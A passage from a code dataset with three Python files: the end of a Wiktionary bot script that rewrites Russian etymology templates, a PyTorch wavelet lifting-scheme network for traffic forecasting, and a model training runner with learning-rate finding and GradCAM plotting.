m.group(1)\n\n def warning(textmsg):\n if etym_change:\n pagemsg(\"WARNING: %s: /// %s /// %s\" % (textmsg, line, line))\n else:\n pagemsg(\"WARNING: %s: %s\" % (textmsg, origt))\n\n found_affix = True\n alt1 = getparam(t, \"alt1\")\n if alt1 and re.search(\"[ое]-$\", alt1):\n tr1 = getparam(t, \"tr1\")\n if tr1:\n warning(\"Found alt1= and tr1=, not sure what to do\")\n continue\n term = getparam(t, \"2\")\n term, termtr = find_stress(term, pagemsg)\n # Fetch all params, moving params > 1 over to the right by one.\n params = []\n for param in t.params:\n pname = str(param.name)\n if pname == \"1\":\n params.append((pname, param.value, param.showkey))\n elif pname == \"2\":\n params.append((\"2\", term, False))\n if termtr:\n params.append((\"tr1\", termtr, True))\n params.append((\"3\", alt1.endswith(\"о-\") and \"-о-\" or \"-е-\", False))\n elif pname != \"alt1\":\n if re.search(\"^[0-9]+$\", pname):\n params.append((str(int(pname) + 1), param.value, param.showkey))\n else:\n m = re.search(\"^(.*?)([0-9]+)$\", pname)\n if m and int(m.group(2)) > 1:\n params.append((m.group(1) + str(int(m.group(2)) + 1), param.value, param.showkey))\n else:\n params.append((pname, param.value, param.showkey))\n # Erase all params.\n del t.params[:]\n # Put back parameters in order.\n for name, value, showkey in params:\n t.add(name, value, showkey=showkey, preserve_spacing=False)\n pagemsg(\"Replaced <%s> with <%s>\" % (origt, str(t)))\n notes.append(\"convert use of alt1= in etyms to proper use of interfixes\")\n else:\n for param in t.params:\n if str(param.value) in [\"-о-\", \"-е-\"]:\n for param2 in t.params:\n if str(param2.name) == \"alt1\":\n warning(\"Has both interfix and alt1= in affix template\")\n break\n else:\n pagemsg(\"Already has interfix in affix template: %s\" % origt)\n break\n else:\n if \"-\" in pagetitle:\n pagemsg(\"No interfix but pagetitle '%s' has hyphen, probably OK: %s\" % (pagetitle, origt))\n elif \" \" in pagetitle:\n pagemsg(\"No interfix but pagetitle '%s' has space, probably OK: %s\" % (pagetitle, origt))\n else:\n warning(\"No interfix and no alt1= alternative\")\n\n if not found_affix:\n pagemsg(\"WARNING: No affix template\")\n\n return str(parsed), notes\n\nparser = blib.create_argparser('Convert use of alt1= in etyms to proper use of interfixes',\n include_pagefile=True, include_stdin=True)\nparser.add_argument('--etym-change', action=\"store_true\",\n help=\"If specified, output warning lines in a format that they can be edited and the changes uploaded.\")\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\netym_change = args.etym_change\n\nblib.do_pagefile_cats_refs(args, start, end, process_text_on_page, edit=True, stdin=True,\n default_cats=[\"Russian compound words\"])\n","sub_path":"convert_etym_to_interfix.py","file_name":"convert_etym_to_interfix.py","file_ext":"py","file_size_in_byte":6477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"607737631","text":"\nimport numpy as np\n\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\n\nimport json\nfrom numpy.lib.stride_tricks import as_strided as ast\n\nfrom torch import nn\nfrom torch import optim\nimport torch\n\nimport pickle as cp\nimport pywt\nfrom torch.nn.utils import weight_norm\n\n\nimport argparse\n\n\n\n\n\n\n\nclass Splitting(nn.Module):\n def __init__(self):\n super(Splitting, self).__init__()\n # Deciding the stride base on the direction\n # self.conv_even = lambda x: x[:, ::2, :]\n # self.conv_odd = lambda x: x[:, 1::2, :]\n\n def even(self, x):\n return x[:, ::2, :]\n def odd(self, x):\n return x[:, 1::2, :]\n\n # def forward(self, x):\n # '''Returns the odd and even part'''\n # return (self.conv_even(x), self.conv_odd(x))\n\n def forward(self, x):\n '''Returns the odd and even part'''\n return (self.even(x), self.odd(x))\n\n\n\n\n\n\nclass LiftingScheme(nn.Module):\n def __init__(self, args, in_planes, modified=False, size=[], splitting=True, k_size=4, dropout=0.5, simple_lifting=False):\n super(LiftingScheme, self).__init__()\n self.modified = args.INN\n\n kernel_size = args.kernel\n dilation = args.dilation\n pad = dilation * (kernel_size - 1) // 2 + 1 # 2 1 0 0\n # pad = k_size // 2\n self.splitting = splitting\n self.split = Splitting()\n\n # Dynamic build sequential network\n modules_P = []\n modules_U = []\n modules_psi = []\n modules_phi = []\n prev_size = 1\n\n # HARD CODED Architecture\n if simple_lifting:\n modules_P += [\n nn.ReplicationPad1d(pad),\n nn.Conv2d(in_planes, in_planes,\n kernel_size=kernel_size, stride=1),\n nn.Dropout(dropout),\n nn.Tanh()\n ]\n modules_U += [\n nn.ReplicationPad1d(pad),\n nn.Conv2d(in_planes, in_planes,\n kernel_size=kernel_size, stride=1),\n\n nn.Dropout(dropout),\n nn.Tanh()\n ]\n else:\n size_hidden = args.hidden_size\n modules_P += [\n nn.ReplicationPad1d(pad),\n nn.Conv1d(in_planes * prev_size, int(in_planes * size_hidden),\n kernel_size=kernel_size, dilation=dilation, stride=1),\n nn.LeakyReLU(negative_slope=0.01, inplace=True),\n nn.Dropout(dropout),\n nn.Conv1d(int(in_planes * size_hidden), in_planes,\n kernel_size=3, stride=1),\n nn.Tanh()\n ]\n modules_U += [\n nn.ReplicationPad1d(pad),\n nn.Conv1d(in_planes * prev_size, int(in_planes * size_hidden),\n kernel_size=kernel_size, dilation=dilation, stride=1),\n nn.LeakyReLU(negative_slope=0.01, inplace=True),\n nn.Dropout(dropout),\n nn.Conv1d(int(in_planes * size_hidden), in_planes,\n kernel_size=3, stride=1),\n nn.Tanh()\n ]\n if self.modified:\n modules_phi += [\n nn.ReplicationPad1d(pad),\n nn.Conv1d(in_planes * prev_size, int(in_planes * size_hidden),\n kernel_size=kernel_size, dilation=dilation, stride=1),\n nn.LeakyReLU(negative_slope=0.01, inplace=True),\n nn.Dropout(dropout),\n nn.Conv1d(int(in_planes * size_hidden), in_planes,\n kernel_size=3, stride=1),\n nn.Tanh()\n ]\n modules_psi += [\n nn.ReplicationPad1d(pad),\n nn.Conv1d(in_planes * prev_size, int(in_planes * size_hidden),\n kernel_size=kernel_size, dilation=dilation, stride=1),\n nn.LeakyReLU(negative_slope=0.01, inplace=True),\n nn.Dropout(dropout),\n nn.Conv1d(int(in_planes * size_hidden), in_planes,\n kernel_size=3, stride=1),\n nn.Tanh()\n ]\n self.phi = nn.Sequential(*modules_phi)\n self.psi = nn.Sequential(*modules_psi)\n\n self.P = nn.Sequential(*modules_P)\n self.U = nn.Sequential(*modules_U)\n\n def forward(self, x):\n if self.splitting:\n # 3 224 112\n # 3 112 112\n (x_even, x_odd) = self.split(x)\n else:\n (x_even, x_odd) = x\n\n if self.modified:\n x_even = x_even.permute(0, 2, 1)\n x_odd = x_odd.permute(0, 2, 1)\n x_odd_update = x_odd.mul(torch.exp(self.phi(x_even))) - self.P(x_even)\n x_even_update = x_even.mul(torch.exp(self.psi(x_odd_update))) + self.U(x_odd_update)\n\n return (x_even_update, x_odd_update)\n\n else:\n\n x_even = x_even.permute(0, 2, 1)\n x_odd = x_odd.permute(0, 2, 1)\n\n d = x_odd - self.P(x_even)\n c = x_even + self.U(d)\n\n return (c, d)\n\n\nclass LiftingSchemeLevel(nn.Module):\n def __init__(self, args, in_planes, share_weights, modified=False, size=[2, 1], kernel_size=4, simple_lifting=False):\n super(LiftingSchemeLevel, self).__init__()\n self.level = LiftingScheme(args,\n in_planes=in_planes, modified=modified,\n size=size, k_size=kernel_size, simple_lifting=simple_lifting)\n\n def forward(self, x):\n '''Returns (LL, LH, HL, HH)'''\n # (L, H)\n (x_even_update, x_odd_update) = self.level(x) # 10 3 224 224\n\n return (x_even_update, x_odd_update)\n\n\nclass BottleneckBlock(nn.Module):\n def __init__(self, in_planes, out_planes, disable_conv):\n super(BottleneckBlock, self).__init__()\n self.bn1 = nn.BatchNorm1d(in_planes)\n self.relu = nn.ReLU(inplace=True)\n # self.relu = nn.LeakyReLU(negative_slope=0.01, inplace=True)\n\n self.disable_conv = disable_conv # in_planes == out_planes\n if not self.disable_conv:\n self.conv1 = nn.Conv1d(in_planes, out_planes, kernel_size=1, stride=1,\n padding=0, bias=False)\n\n def forward(self, x):\n if self.disable_conv:\n return self.relu(self.bn1(x))\n else:\n return self.conv1(self.relu(self.bn1(x)))\n\n\nclass LevelWASN(nn.Module):\n def __init__(self, args, in_planes, lifting_size, kernel_size, no_bottleneck,\n share_weights, simple_lifting, regu_details, regu_approx):\n super(LevelWASN, self).__init__()\n self.regu_details = regu_details\n self.regu_approx = regu_approx\n if self.regu_approx + self.regu_details > 0.0:\n self.loss_details = nn.SmoothL1Loss()\n\n self.wavelet = LiftingSchemeLevel(args, in_planes, share_weights,\n size=lifting_size, kernel_size=kernel_size,\n simple_lifting=simple_lifting)\n self.share_weights = share_weights\n if no_bottleneck:\n # We still want to do a BN and RELU, but we will not perform a conv\n # as the input_plane and output_plare are the same\n self.bootleneck = BottleneckBlock(in_planes, in_planes, disable_conv=True)\n else:\n self.bootleneck = BottleneckBlock(in_planes, in_planes, disable_conv=False)\n\n def forward(self, x):\n (x_even_update, x_odd_update) = self.wavelet(x) # 10 9 128\n approx = x_even_update\n details = x_odd_update\n r = None\n if (self.regu_approx + self.regu_details != 0.0): # regu_details=0.01, regu_approx=0.01\n\n if self.regu_details:\n rd = self.regu_details * \\\n details.abs().mean()\n\n # Constrain on the approximation\n if self.regu_approx:\n rc = self.regu_approx * torch.dist(approx.mean(), x.mean(), p=2)\n\n if self.regu_approx == 0.0:\n # Only the details\n r = rd\n elif self.regu_details == 0.0:\n # Only the approximation\n r = rc\n else:\n # Both\n r = rd + rc\n\n if self.bootleneck:\n return self.bootleneck(approx).permute(0, 2, 1), r, details\n else:\n return approx.permute(0, 2, 1), r, details\n\n\n\nclass EncoderTree(nn.Module):\n def __init__(self, level_layers, level_parts, Encoder = True, norm_layer=None):\n super(EncoderTree, self).__init__()\n self.level_layers = nn.ModuleList(level_layers)\n self.conv_layers = None #nn.ModuleList(conv_layers) if conv_layers is not None else None\n self.norm = norm_layer\n # self.level_part = [[1, 1], [0, 0], [0, 0]]\n self.level_part = level_parts #[[0, 1], [0, 0]]\n\n self.count_levels = 0\n self.ecoder = Encoder\n\n def reOrder(self, num_of_length, layer=2):\n N = num_of_length\n n = list(range(1, N + 1, 1))\n remain = [i % 2 for i in n]\n integ = [int(i / 2) for i in n]\n n_1 = []\n for i in range(N):\n if remain[i] > 0:\n n_1.append((n[i] + 1) / 2 + N / 2)\n else:\n n_1.append(n[i] / 2)\n\n remain = [i % 2 for i in n_1]\n integ = [int(i / 2) for i in n_1]\n\n n_2 = []\n rem4 = [i % 4 for i in n]\n\n for i in range(N):\n if rem4[i] == 0:\n n_2.append(int(n[i] / 4))\n\n elif rem4[i] == 1:\n\n n_2.append(int((3 * N + 3) / 4 + n[i] / 4))\n elif rem4[i] == 2:\n n_2.append(int((1 * N + 2) / 4 + n[i] / 4))\n elif rem4[i] == 3:\n n_2.append(int((2 * N + 1) / 4 + n[i] / 4))\n else:\n print(\"Error!\")\n\n n_3 = []\n rem8 = [i % 8 for i in n]\n for i in range(N):\n if rem8[i] == 0:\n n_3.append(int(n[i] / 8))\n elif rem8[i] == 1:\n n_3.append(int(n[i] / 8 + (7 * N + 7) / 8))\n elif rem8[i] == 2:\n n_3.append(int(n[i] / 8 + (3 * N + 6) / 8))\n elif rem8[i] == 3:\n n_3.append(int(n[i] / 8 + (5 * N + 5) / 8))\n elif rem8[i] == 4:\n n_3.append(int(n[i] / 8 + (1 * N + 4) / 8))\n elif rem8[i] == 5:\n n_3.append(int(n[i] / 8 + (6 * N + 3) / 8))\n elif rem8[i] == 6:\n n_3.append(int(n[i] / 8 + (2 * N + 2) / 8))\n elif rem8[i] == 7:\n n_3.append(int(n[i] / 8 + (4 * N + 1) / 8))\n\n else:\n print(\"Error!\")\n if layer == 1:\n return [i - 1 for i in n_1]\n if layer == 2:\n return [i - 1 for i in n_2]\n if layer == 3:\n return [i - 1 for i in n_3]\n\n\n def forward(self, x, attn_mask=None):\n\n # x [B, L, D] torch.Size([16, 336, 512])\n rs = [] # List of constrains on details and mean\n det = [] # List of averaged pooled details\n x_reorder = []\n input = [x, ]\n for l in self.level_layers:\n x_even_update, r, x_odd_update = l(input[0])\n\n if self.level_part[self.count_levels][0]:\n input.append(x_even_update)\n else:\n x_even_update = x_even_update.permute(0, 2, 1)\n det += [x_even_update] ##############################################################################\n if self.level_part[self.count_levels][1]:\n x_odd_update = x_odd_update.permute(0, 2, 1)\n input.append(x_odd_update)\n else:\n det += [x_odd_update] ##############################################################################\n del input[0]\n rs += [r]\n self.count_levels = self.count_levels + 1\n\n for aprox in input:\n aprox = aprox.permute(0, 2, 1) # b 77 1\n # aprox = self.avgpool(aprox) ##############################################################################\n det += [aprox]\n\n self.count_levels = 0\n # We add them inside the all GAP detail coefficients\n\n x = torch.cat(det, 2) # torch.Size([32, 307, 12])\n index = self.reOrder(x.shape[2], layer=2)\n x_reorder = [x[:, :, i].unsqueeze(2) for i in index]\n\n x_reorder = torch.cat(x_reorder, 2)\n\n x = x_reorder.permute(0, 2, 1)\n # x = x.permute(0, 2, 1)\n if self.norm is not None:\n x = self.norm(x) #torch.Size([16, 512, 336])\n\n return x\n\nclass Chomp1d(nn.Module):\n def __init__(self, chomp_size):\n super(Chomp1d, self).__init__()\n self.chomp_size = chomp_size\n\n def forward(self, x):\n return x[:, :, :-self.chomp_size].contiguous()\n\n\nclass WASN(nn.Module):\n def __init__(self, args, num_classes, num_stacks = 3 , first_conv=9,\n number_levels=4, number_level_part=[[1, 0], [1, 0], [1, 0]],\n no_bootleneck=True):\n super(WASN, self).__init__()\n\n\n\n\n # First convolution\n\n\n # self.first_conv = True\n # self.conv_first = nn.Sequential(\n # weight_norm(nn.Conv1d(first_conv, int(args.hidden_size * first_conv),\n # kernel_size=2, stride=1, padding=1, bias=False)),\n # # nn.BatchNorm1d(extend_channel),\n # Chomp1d(1),\n # nn.LeakyReLU(negative_slope=0.01, inplace=True),\n # nn.Dropout(0.5),\n # # weight_norm(nn.Conv1d(args.hidden_size * first_conv, first_conv,\n # # kernel_size=2, stride=1, padding=1, bias=False)),\n # #\n # # nn.LeakyReLU(negative_slope=0.01, inplace=True),\n # # nn.Dropout(0.5),\n # )\n # self.conv_Second = nn.Sequential(\n # weight_norm(nn.Conv1d(first_conv, int(args.hidden_size * first_conv),\n # kernel_size=2, stride=1, padding=1, bias=False)),\n # # nn.BatchNorm1d(extend_channel),\n # Chomp1d(1),\n # nn.LeakyReLU(negative_slope=0.01, inplace=True),\n # nn.Dropout(0.5),\n # # weight_norm(nn.Conv1d(args.hidden_size * first_conv, first_conv,\n # # kernel_size=2, stride=1, padding=1, bias=False)),\n # #\n # # nn.LeakyReLU(negative_slope=0.01, inplace=True),\n # # nn.Dropout(0.5),\n # )\n\n\n\n in_planes = first_conv\n out_planes = first_conv * (number_levels + 1)\n self.pe = args.positionalEcoding\n\n self.blocks1 = EncoderTree(\n [\n LevelWASN(args = args, in_planes=in_planes,\n lifting_size=[2, 1], kernel_size=4, no_bottleneck=True,\n share_weights=False, simple_lifting=False, regu_details=0.01, regu_approx=0.01)\n\n for l in range(number_levels)\n ],\n\n\n level_parts = number_level_part,\n Encoder = True\n )\n\n self.blocks2 = EncoderTree(\n [\n LevelWASN(args=args, in_planes=in_planes,\n lifting_size=[2, 1], kernel_size=4, no_bottleneck=True,\n share_weights=False, simple_lifting=False, regu_details=0.01, regu_approx=0.01)\n\n for l in range(number_levels)\n ],\n\n\n level_parts= number_level_part,\n Encoder = False\n )\n\n if no_bootleneck:\n in_planes *= 1\n\n self.num_planes = out_planes\n\n\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n # nn.init.xavier_uniform_(m.weight.data)\n # if m.bias is not None:\n m.bias.data.zero_()\n\n\n self.projection1 = nn.Conv1d(args.window_size, num_classes,\n kernel_size=1, stride=1, bias=False)\n\n self.projection2 = nn.Conv1d(args.window_size+num_classes, num_classes,\n kernel_size=1, stride=1, bias=False)\n\n\n \n self.hidden_size = in_planes \n # For positional encoding\n if self.hidden_size%2 == 1:\n self.hidden_size += 1\n\n num_timescales = self.hidden_size // 2 # 词维度除以2,因为词维度一半要求sin,一半要求cos\n max_timescale = 10000.0\n min_timescale = 1.0\n # min_timescale: 将应用于每个位置的最小尺度\n # max_timescale: 在每个位置应用的最大尺度\n log_timescale_increment = (\n math.log(float(max_timescale) / float(min_timescale)) /\n max(num_timescales - 1, 1)) # 因子log(max/min) / (256-1)\n temp = torch.arange(num_timescales, dtype=torch.float32)\n inv_timescales = min_timescale * torch.exp(\n torch.arange(num_timescales, dtype=torch.float32) *\n -log_timescale_increment) # 将log(max/min)均分num_timescales份数(词维度一半)\n self.register_buffer('inv_timescales', inv_timescales)\n def get_position_encoding(self, x):\n max_length = x.size()[1]\n position = torch.arange(max_length, dtype=torch.float32,\n device=x.device) #tensor([0., 1., 2., 3., 4.], device='cuda:0')\n temp1 = position.unsqueeze(1) #5 1\n temp2 = self.inv_timescales.unsqueeze(0) #1 256\n scaled_time = position.unsqueeze(1) * self.inv_timescales.unsqueeze(0) #5 256\n signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)],\n dim=1) #5 512 [T, C]\n signal = F.pad(signal, (0, 0, 0, self.hidden_size % 2))\n signal = signal.view(1, max_length, self.hidden_size)\n\n\n\n # signal = F.pad(signal, (1, self.hidden_size % 2), \"constant\", 0)\n # if self.hidden_size % 2==1:\n # signal = signal[:,1:]\n # signal = signal.view(1, max_length, self.hidden_size)\n \n return signal\n\n def creatMask(self, x):\n b, l, c = x.shape\n mask_ratio = nn.Dropout(p=0.8)\n Mask = torch.ones(b, l, c, device=x.device)\n Mask = mask_ratio(Mask)\n Mask = Mask > 0 # torch.Size([8, 1, 48, 48])\n Mask = Mask\n x.masked_fill(Mask, 0)\n return x\n\n def forward(self, x):\n if self.pe:\n pe = self.get_position_encoding(x)\n if pe.shape[2]>x.shape[2]:\n x += pe[:,:,:-1]\n else:\n x += self.get_position_encoding(x)\n # res1 = x\n # if self.first_conv:\n # x = x.permute(0,2,1)\n # x = self.conv_first(x)\n # x = x.permute(0, 2, 1)\n # x = self.creatMask(x)\n res1 = x\n\n x = self.blocks1(x, attn_mask=None)\n\n x += res1\n\n x = self.projection1(x)\n MidOutPut = x\n\n x = torch.cat((res1, x), dim=1)\n # res2 = x\n\n # if self.first_conv:\n # x = x.permute(0,2,1)\n # x = self.conv_Second(x)\n # x = x.permute(0, 2, 1)\n\n res2 = x\n\n x = self.blocks2(x, attn_mask=None)\n x += res2\n x = self.projection2(x)\n return x, MidOutPut\n\n\n\n\n\n\n\n\n\ndef get_variable(x):\n x = Variable(x)\n return x.cuda() if torch.cuda.is_available() else x\n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--train', type=bool, default=True)\n parser.add_argument('--evaluate', type=bool, default=False)\n parser.add_argument('--dataset', type=str, default='PeMS03_data') # PeMS07\n parser.add_argument('--window_size', type=int, default=12)\n parser.add_argument('--horizon', type=int, default=12)\n parser.add_argument('--train_length', type=float, default=7)\n parser.add_argument('--valid_length', type=float, default=2)\n parser.add_argument('--test_length', type=float, default=1)\n parser.add_argument('--epoch', type=int, default=50)\n parser.add_argument('--lr', type=float, default=3 * 1e-5)\n parser.add_argument('--multi_layer', type=int, default=5)\n parser.add_argument('--device', type=str, default='cuda:0')\n parser.add_argument('--validate_freq', type=int, default=1)\n parser.add_argument('--batch_size', type=int, default=32)\n parser.add_argument('--norm_method', type=str, default='z_score')\n parser.add_argument('--optimizer', type=str, default='RMSProp')\n parser.add_argument('--early_stop', type=bool, default=False)\n parser.add_argument('--exponential_decay_step', type=int, default=5)\n parser.add_argument('--decay_rate', type=float, default=0.5)\n parser.add_argument('--dropout_rate', type=float, default=0.5)\n parser.add_argument('--leakyrelu_rate', type=int, default=0.2)\n\n # Action Part\n\n parser.add_argument('--share-weight', default=0, type=int, help='share weight or not in attention q,k,v')\n parser.add_argument('--temp', default=0, type=int, help='Use temporature weights or not, if false, temp=1')\n parser.add_argument('--hidden-size', default=1, type=int, help='hidden channel of module')\n parser.add_argument('--INN', default=1, type=int, help='use INN or basic strategy')\n parser.add_argument('--kernel', default=3, type=int, help='kernel size')\n parser.add_argument('--dilation', default=1, type=int, help='dilation')\n parser.add_argument('--positionalEcoding', type=bool, default=True)\n\n args = parser.parse_args()\n # part = [[1, 1], [1, 1], [1, 1], [0, 0], [0, 0], [0, 0], [0, 0]] # Best model\n part = [[1, 1], [0, 0], [0, 0]]\n # part = [ [0, 0]]\n\n print('level number {}, level details: {}'.format(len(part), part))\n model = WASN(args, num_classes=12, first_conv=307,\n number_levels=len(part),\n number_level_part=part).cuda()\n x = torch.randn(32, 12, 307).cuda()\n y,res = model(x)\n print(y.shape)","sub_path":"models/StackTWaveNetTransformerEncoder.py","file_name":"StackTWaveNetTransformerEncoder.py","file_ext":"py","file_size_in_byte":22322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"490601471","text":"import math\nimport torch\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as model_scheduler\nimport pprint\n\nimport matplotlib.pyplot as plt\n\n# import model.model as model_arch\nimport model.loss as model_loss\nimport data_loader.augmentations as augmentations\nimport data_loader.data_loaders as model_data_loaders\nimport utils.plot as plot\n\nfrom trainer.trainer import Trainer\nfrom torchsummary import summary\n\nfrom utils.config import get_instance, setup_seed, setup_device, setup_model_params\nfrom utils.logger import setup_logger\nfrom utils.grad_cam import get_gradcam, plot_gradcam\nfrom utils.lr_finder import LRFinder\n\nlogger = setup_logger(__name__)\n\n\nclass Runner:\n def __init__(self, config, custom_model=False):\n self.config = config\n self.custom_model = custom_model\n\n def setup_train(self):\n config = self.config\n logger.info(\"Training Configuration\")\n\n if self.custom_model is True:\n import model.custom_model as model_arch\n else:\n import model.model as model_arch\n\n # displaying the config fie\n for line in pprint.pformat(config).split(\"\\n\"):\n logger.info(line)\n\n # setup seed for reproducibility of results\n setup_seed(config[\"seed\"])\n\n # create model instance\n model = get_instance(model_arch, \"arch\", config)\n\n # setup model with device\n model, device = setup_device(model, config[\"target_device\"])\n\n model_params = setup_model_params(model, config[\"optimizer\"])\n\n optimizer = get_instance(optim, \"optimizer\", config, model_params)\n\n self.transforms = get_instance(augmentations, \"transforms\", config)\n\n # train and test dataloaders\n self.data_loader = get_instance(\n model_data_loaders, \"data_loader\", config, self.transforms\n )\n\n train_loader, test_loader = self.data_loader.get_loaders()\n\n # Loss Function\n criterion = getattr(model_loss, config[\"criterion\"])\n\n batch_scheduler = False\n if config[\"lr_scheduler\"][\"type\"] == \"OneCycleLR\":\n print(\"OneCycleLR\")\n logger.info(\"Building: torch.optim.lr_scheduler.OneCycleLR\")\n max_at_epoch = config[\"lr_scheduler\"][\"max_lr_at_epoch\"]\n pct_start = (\n max_at_epoch / config[\"training\"][\"epochs\"] if max_at_epoch else 0.8\n )\n scheduler_config = config[\"lr_scheduler\"][\"args\"]\n lr_scheduler = torch.optim.lr_scheduler.OneCycleLR(\n optimizer,\n max_lr=scheduler_config[\"max_lr\"],\n steps_per_epoch=len(train_loader),\n pct_start=pct_start,\n epochs=config[\"training\"][\"epochs\"],\n )\n batch_scheduler = True\n else:\n lr_scheduler = get_instance(\n model_scheduler, \"lr_scheduler\", config, optimizer\n )\n\n logger.info(\"Intializing the Trainer\")\n self.trainer = Trainer(\n model,\n optimizer,\n criterion,\n config,\n device,\n train_loader,\n test_loader,\n lr_scheduler=lr_scheduler,\n batch_scheduler=batch_scheduler,\n )\n\n def model_summary(self, input_size):\n summary(self.trainer.model, input_size)\n\n def plot_metrics(self):\n logger.info(\"Plotting the Metrics.\")\n plt = plot.model_metrics(self.trainer.train_metric, self.trainer.test_metric)\n plot.plot_lr_metric(self.trainer.lr_metric)\n\n return plt\n\n def plot_gradcam(self, target_layers):\n logger.info(\"Plotting GradCAM.\")\n\n data, target = next(iter(self.trainer.test_loader))\n data, target = data.to(self.trainer.device), target.to(self.trainer.device)\n\n logger.info(\"Plotting for 5 Samples.\")\n data = data[:5]\n target = target[:5]\n\n # get generated GradCAM data\n gcam_layers, predicted_probs, predicted_classes = get_gradcam(\n data, target, self.trainer.model, self.trainer.device, target_layers\n )\n\n # get the denomarlization function\n unorm = augmentations.UnNormalize(\n mean=self.transforms.mean, std=self.transforms.std\n )\n plot_gradcam(\n gcam_layers,\n data,\n target,\n predicted_classes,\n self.data_loader.class_names,\n unorm,\n )\n\n def plot_misclassified(self, target_layers):\n\n assert self.trainer.model is not None\n logger.info(\"Model Misclassified Images.\")\n misclassified = []\n misclassified_target = []\n misclassified_predictions = []\n\n model, device = self.trainer.model, self.trainer.device\n\n model.eval()\n\n with torch.no_grad():\n for data, target in self.trainer.test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n predictions = output.argmax(dim=1, keepdim=True)\n misclassified_list = target.eq(predictions.view_as(target)) == False\n\n misclassified.append(data[misclassified_list])\n misclassified_target.append(target[misclassified_list])\n misclassified_predictions.append(predictions[misclassified_list])\n\n misclassified = torch.cat(misclassified)\n misclassified_target = torch.cat(misclassified_target)\n misclassified_predictions = torch.cat(misclassified_predictions)\n\n logger.info(\"Selecting 25 misclassified Samples.\")\n\n data = misclassified[:25]\n target = misclassified_target[:25]\n\n # get generated GradCAM data\n gcam_layers, predicted_probs, predicted_classes = get_gradcam(\n data, target, self.trainer.model, self.trainer.device, target_layers\n )\n\n # get denormalization function\n unorm = augmentations.UnNormalize(\n mean=self.transforms.mean, std=self.transforms.std\n )\n\n plot_gradcam(\n gcam_layers,\n data,\n target,\n predicted_classes,\n self.data_loader.class_names,\n unorm,\n )\n\n def find_lr(self):\n logger.info(\"Finding best Learning Rate.\")\n config = self.config\n\n if self.custom_model is True:\n import model.custom_model as model_arch\n\n print(\"custom_model\")\n else:\n import model.model as model_arch\n\n print(\"local_model\")\n\n # setup seed for reproducibility of results\n setup_seed(config[\"seed\"])\n\n # create model instance\n model = get_instance(model_arch, \"arch\", config)\n\n # setup model with device\n model, device = setup_device(model, config[\"target_device\"])\n\n model_params = setup_model_params(model, config[\"optimizer\"])\n optimizer = get_instance(optim, \"optimizer\", config, model_params)\n\n # self.transforms = get_instance(augmentations, \"transforms\", config)\n\n # Loss Function\n criterion = getattr(model_loss, config[\"criterion\"])\n\n self.lr_finder = LRFinder(model, optimizer, criterion, device=\"cuda\")\n\n lr_finder_epochs = config[\"lr_finder\"][\"epochs\"]\n\n self.lr_finder.range_test(\n self.trainer.train_loader,\n start_lr=1e-3,\n end_lr=1,\n num_iter=len(self.trainer.test_loader) * lr_finder_epochs,\n step_mode=\"linear\",\n )\n\n self.best_lr = self.lr_finder.history[\"lr\"][\n self.lr_finder.history[\"loss\"].index(self.lr_finder.best_loss)\n ]\n sorted_lrs = [\n x\n for _, x in sorted(\n zip(self.lr_finder.history[\"loss\"], self.lr_finder.history[\"lr\"])\n )\n ]\n\n logger.info(f\"sorted lrs: {sorted_lrs[:10]}\")\n logger.info(f\"best lr: {self.best_lr}\")\n logger.info(\"plotting lr_finder\")\n\n self.lr_finder.plot()\n\n # reset the model and optimizer\n self.lr_finder.reset()\n plt.show()\n\n del model, optimizer, criterion\n\n def train_lr(self, use_best_lr=False, lr_value=None):\n\n if use_best_lr and self.best_lr is not None:\n logger.info(f\"Using max_lr: {self.best_lr}\")\n logger.info(f\"Using min_lr: {self.best_lr/30}\")\n logger.info(f\"Using initial_lr: {self.best_lr/20}\")\n for param_group in self.trainer.optimizer.param_groups:\n param_group[\"lr\"] = self.best_lr / 10\n param_group[\"max_lr\"] = self.best_lr\n param_group[\"min_lr\"] = self.best_lr / 30\n param_group[\"initial_lr\"] = self.best_lr / 20\n\n if not use_best_lr and lr_value is not None:\n for param_group in self.trainer.optimizer.param_groups:\n param_group[\"lr\"] = lr_value\n\n self.trainer.train()\n logger.info(\"Finished.\")\n\n def find_lr1(self):\n from torch_lr_finder import LRFinder as LR_Finder\n\n logger.info(\"Finding best Learning Rate.\")\n config = self.config\n\n if self.custom_model is True:\n import model.custom_model as model_arch\n\n print(\"custom_model\")\n else:\n import model.model as model_arch\n\n print(\"local_model\")\n\n # setup seed for reproducibility of results\n setup_seed(config[\"seed\"])\n\n # create model instance\n model = get_instance(model_arch, \"arch\", config)\n\n # setup model with device\n model, device = setup_device(model, config[\"target_device\"])\n\n model_params = setup_model_params(model, config[\"optimizer\"])\n optimizer = get_instance(optim, \"optimizer\", config, model_params)\n\n # self.transforms = get_instance(augmentations, \"transforms\", config)\n\n # Loss Function\n criterion = getattr(model_loss, config[\"criterion\"])()\n\n self.lr_finder = LR_Finder(model, optimizer, criterion, device=\"cuda\")\n\n lr_finder_epochs = config[\"lr_finder\"][\"epochs\"]\n logger.info(f\"Running LR-Test for {lr_finder_epochs} epochs\")\n # my method\n self.lr_finder.range_test(\n self.trainer.train_loader,\n start_lr=1e-3,\n end_lr=1,\n num_iter=len(self.trainer.test_loader) * lr_finder_epochs,\n step_mode=\"linear\",\n )\n\n # leslie smith method\n # self.lr_finder.range_test(self.trainer.train_loader, val_loader = self.trainer.test_loader,\n # end_lr=1, num_iter=len(self.trainer.train_loader), step_mode='linear')\n\n # fast ai method\n # self.lr_finder.range_test(\n # self.trainer.train_loader, end_lr=100, num_iter=len(self.trainer.train_loader))\n\n self.best_lr = self.lr_finder.history[\"lr\"][\n self.lr_finder.history[\"loss\"].index(self.lr_finder.best_loss)\n ]\n\n sorted_lrs = [\n x\n for _, x in 